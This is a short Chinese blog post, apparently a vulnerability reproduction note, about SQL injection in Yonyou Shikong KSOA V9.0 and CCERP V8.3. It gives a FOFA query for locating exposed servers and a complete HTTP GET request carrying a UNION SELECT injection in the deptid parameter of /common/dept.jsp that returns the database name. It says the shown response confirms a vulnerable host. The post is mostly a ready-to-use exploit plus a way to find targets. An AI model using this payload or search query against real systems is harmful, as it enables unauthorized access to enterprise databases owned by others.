文章探讨了用友时空软件中的安全漏洞,涉及版本更新,指出可通过特定请求方式复现,重点关注于企业系统的Web应用安全问题。
影响版本
用友时空 KSOA V9.0
用友时空 CCERP V8.3
复现
FOFA:app=“用友-时空KSOA”
测试地址
GET /common/dept.jsp?deptid=1'%20UNION%20ALL%20SELECT%2060%2Cdb_name()-- HTTP/1.1
Host: your-IP
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
出现如下图所示:代表存在漏洞
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
